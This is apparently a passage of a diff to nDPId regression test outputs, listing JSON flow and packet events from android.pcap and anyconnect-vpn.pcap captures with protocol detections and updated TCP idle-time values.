00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454869626,"flow_last_seen":1582454870649,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":49510,"dst_port":5228,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00658{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454866803,"flow_last_seen":1582454871058,"flow_idle_time":120000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip6","src_ip":"fe80::4e6a:f6ff:fe9f:f627","dst_ip":"ff02::2","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}}
00659{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454866803,"flow_last_seen":1582454866894,"flow_idle_time":120000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":56,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip6","src_ip":"fe80::4e6a:f6ff:fe9f:f627","dst_ip":"ff02::16","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}}
00682{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1582454871553,"flow_last_seen":1582454871667,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":3573,"flow_avg_l4_payload_len":255,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.20.76","src_port":43634,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DataSaver","breed":"Fun","category":"Web"}}
00682{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1582454871829,"flow_last_seen":1582454872026,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":3573,"flow_avg_l4_payload_len":255,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.20.76","src_port":43646,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DataSaver","breed":"Fun","category":"Web"}}
00646{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454872031,"flow_last_seen":1582454872031,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.20.76","src_port":43652,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}}
00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454872031,"flow_last_seen":1582454872031,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.20.76","src_port":43652,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00682{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1582454871553,"flow_last_seen":1582454871667,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":3573,"flow_avg_l4_payload_len":255,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.20.76","src_port":43634,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DataSaver","breed":"Fun","category":"Web"}}
00682{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1582454871829,"flow_last_seen":1582454872026,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":3573,"flow_avg_l4_payload_len":255,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.20.76","src_port":43646,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DataSaver","breed":"Fun","category":"Web"}}
00646{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454872031,"flow_last_seen":1582454872031,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.20.76","src_port":43652,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}}
00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454872031,"flow_last_seen":1582454872031,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.20.76","src_port":43652,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454871292,"flow_last_seen":1582454871294,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":46359,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"}}
00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"finished","flow_packets_processed":27,"flow_first_seen":1582454871103,"flow_last_seen":1582454871450,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":5661,"flow_avg_l4_payload_len":209,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.21.202","src_port":51928,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DataSaver","breed":"Fun","category":"Web"}}
00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":1582454871814,"flow_last_seen":1582454872019,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":594,"flow_tot_l4_payload_len":3276,"flow_avg_l4_payload_len":136,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.21.202","src_port":51944,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DataSaver","breed":"Fun","category":"Web"}}
00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"finished","flow_packets_processed":27,"flow_first_seen":1582454871103,"flow_last_seen":1582454871450,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":5661,"flow_avg_l4_payload_len":209,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.21.202","src_port":51928,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DataSaver","breed":"Fun","category":"Web"}}
00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":1582454871814,"flow_last_seen":1582454872019,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":594,"flow_tot_l4_payload_len":3276,"flow_avg_l4_payload_len":136,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.21.202","src_port":51944,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DataSaver","breed":"Fun","category":"Web"}}
00674{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454871061,"flow_last_seen":1582454871100,"flow_idle_time":180000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":58,"flow_tot_l4_payload_len":100,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":7660,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.DataSaver","breed":"Fun","category":"Web"}}
00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454871600,"flow_last_seen":1582454871601,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":58892,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"}}
00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454867723,"flow_last_seen":1582454867761,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":54837,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.GoogleServices","breed":"Acceptable","category":"Web"}}

278
test/results/anyconnect-vpn.pcap.out
View File

@@ -1,16 +1,16 @@
00465{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0}
00551{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1569687240992}
00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687240992,"flow_last_seen":1569687240992,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1569687240992,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"184.25.56.53","src_port":56885,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1569687240992,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569687240992,"pkt":"LH6BsEqhNDY7z3UoCABFAAA0AABAAEAGP5MKAADjuBk4Nd41AFDGVya80\/P93YAREABFkgAAAQEIChwNaWayL1Dq"}
00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1569687241009,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569687241009,"pkt":"NDY7z3UoLH6BsEqhCABFAAA0BhtAADcGQni4GTg1CgAA4wBQ3jXT8\/3dxlcmvYARAOurFAAAAQEICrIv+nscDWlm"}
00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1569687241009,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569687241009,"pkt":"LH6BsEqhNDY7z3UoCABFAAA0AABAAEAGP5MKAADjuBk4Nd41AFDGVya90\/P93oAQEACb7gAAAQEIChwNaXeyL\/p7"}
00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687241064,"flow_last_seen":1569687241064,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1569687241064,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"10.0.0.151","src_port":56916,"dst_port":8009,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1569687241064,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1569687241064,"pkt":"2DE0IHf7NDY7z3UoCABFAABAAABAAEAGJT8KAADjCgAAl95UH0ntZWziAAAAALAC\/\/9D4wAAAgQFtAEDAwUBAQgKHA1prQAAAAAEAgAA"}
00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687241422,"flow_last_seen":1569687241422,"flow_idle_time":7440000,"flow_min_l4_payload_len":110,"flow_max_l4_payload_len":110,"flow_tot_l4_payload_len":110,"flow_avg_l4_payload_len":110,"midstream":1,"thread_ts_msec":1569687241422,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"10.0.0.149","src_port":56320,"dst_port":8009,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00625{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1569687241422,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":176,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":176,"pkt_l4_len":142,"thread_ts_msec":1569687241422,"pkt":"pHczjPFANDY7z3UoCABFAgCiAABAAEAGJN0KAADjCgAAldwAH0m4VKQ8auVpuYAYEABwEgAAAQEIChwNaxEAIdNWFwMDAGnlEQRtW5ojm6mWGmuJ194WM1mCL2bpF6lVRy8fAR1ACLW+\/3MKXobzfgt7ehMx+gNqTDxT8XKtVt5pIDD++LOG\/\/cqs3TN3c3wAeYVwc4BceqqH837rqaW0xgZLYui1J36mDCwUeIDu0c="}
00645{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687241422,"flow_last_seen":1569687241422,"flow_idle_time":7440000,"flow_min_l4_payload_len":110,"flow_max_l4_payload_len":110,"flow_tot_l4_payload_len":110,"flow_avg_l4_payload_len":110,"midstream":1,"thread_ts_msec":1569687241422,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"10.0.0.149","src_port":56320,"dst_port":8009,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"CiscoVPN","breed":"Acceptable","category":"VPN"}}
00625{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1569687241425,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":176,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":176,"pkt_l4_len":142,"thread_ts_msec":1569687241425,"pkt":"NDY7z3UopHczjPFACABFAgCiFAFAAEAGENwKAACVCgAA4x9J3ABq5Wm5uFSkqoAYARVOTgAAAQEICgAh1UocDWsRFwMDAGlPAxZ+sivF5tip\/a4L1+WZBjanPy6dIIBwPewIOXwBBC++JWdD5zwUQ1UFmtf+v81kwZap7Lx2\/Gcfr+ckh4zK2QCeLZSVHkvGQHTulBE1960y\/ZxOXKVM8M0GvGzhWev1+K8IvZbQRCI="}
00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1569687241425,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569687241425,"pkt":"pHczjPFANDY7z3UoCABFAAA0AABAAEAGJU0KAADjCgAAldwAH0m4VKSqauVqJ4AQD\/zHZwAAAQEIChwNaxMAIdVK"}
00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687240992,"flow_last_seen":1569687240992,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1569687240992,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"184.25.56.53","src_port":56885,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1569687240992,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569687240992,"pkt":"LH6BsEqhNDY7z3UoCABFAAA0AABAAEAGP5MKAADjuBk4Nd41AFDGVya80\/P93YAREABFkgAAAQEIChwNaWayL1Dq"}
00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1569687241009,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569687241009,"pkt":"NDY7z3UoLH6BsEqhCABFAAA0BhtAADcGQni4GTg1CgAA4wBQ3jXT8\/3dxlcmvYARAOurFAAAAQEICrIv+nscDWlm"}
00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1569687241009,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569687241009,"pkt":"LH6BsEqhNDY7z3UoCABFAAA0AABAAEAGP5MKAADjuBk4Nd41AFDGVya90\/P93oAQEACb7gAAAQEIChwNaXeyL\/p7"}
00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687241064,"flow_last_seen":1569687241064,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1569687241064,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"10.0.0.151","src_port":56916,"dst_port":8009,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1569687241064,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1569687241064,"pkt":"2DE0IHf7NDY7z3UoCABFAABAAABAAEAGJT8KAADjCgAAl95UH0ntZWziAAAAALAC\/\/9D4wAAAgQFtAEDAwUBAQgKHA1prQAAAAAEAgAA"}
00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687241422,"flow_last_seen":1569687241422,"flow_idle_time":7560000,"flow_min_l4_payload_len":110,"flow_max_l4_payload_len":110,"flow_tot_l4_payload_len":110,"flow_avg_l4_payload_len":110,"midstream":1,"thread_ts_msec":1569687241422,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"10.0.0.149","src_port":56320,"dst_port":8009,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00625{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1569687241422,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":176,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":176,"pkt_l4_len":142,"thread_ts_msec":1569687241422,"pkt":"pHczjPFANDY7z3UoCABFAgCiAABAAEAGJN0KAADjCgAAldwAH0m4VKQ8auVpuYAYEABwEgAAAQEIChwNaxEAIdNWFwMDAGnlEQRtW5ojm6mWGmuJ194WM1mCL2bpF6lVRy8fAR1ACLW+\/3MKXobzfgt7ehMx+gNqTDxT8XKtVt5pIDD++LOG\/\/cqs3TN3c3wAeYVwc4BceqqH837rqaW0xgZLYui1J36mDCwUeIDu0c="}
00645{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687241422,"flow_last_seen":1569687241422,"flow_idle_time":7560000,"flow_min_l4_payload_len":110,"flow_max_l4_payload_len":110,"flow_tot_l4_payload_len":110,"flow_avg_l4_payload_len":110,"midstream":1,"thread_ts_msec":1569687241422,"l3_proto":"ip4","src_ip":"10.0.0.227","dst_ip":"10.0.0.149","src_port":56320,"dst_port":8009,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"CiscoVPN","breed":"Acceptable","category":"VPN"}}
00625{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1569687241425,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":176,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":176,"pkt_l4_len":142,"thread_ts_msec":1569687241425,"pkt":"NDY7z3UopHczjPFACABFAgCiFAFAAEAGENwKAACVCgAA4x9J3ABq5Wm5uFSkqoAYARVOTgAAAQEICgAh1UocDWsRFwMDAGlPAxZ+sivF5tip\/a4L1+WZBjanPy6dIIBwPewIOXwBBC++JWdD5zwUQ1UFmtf+v81kwZap7Lx2\/Gcfr+ckh4zK2QCeLZSVHkvGQHTulBE1960y\/ZxOXKVM8M0GvGzhWev1+K8IvZbQRCI="}
00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1569687241425,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569687241425,"pkt":"pHczjPFANDY7z3UoCABFAAA0AABAAEAGJU0KAADjCgAAldwAH0m4VKSqauVqJ4AQD\/zHZwAAAQEIChwNaxMAIdVK"}
00537{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8,"source":"anyconnect-vpn.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569687241452,"flow_last_seen":1569687241452,"flow_idle_time":600000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1569687241452,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"224.0.0.1","l4_proto":2,"flow_datalink":1,"flow_max_packets":3}
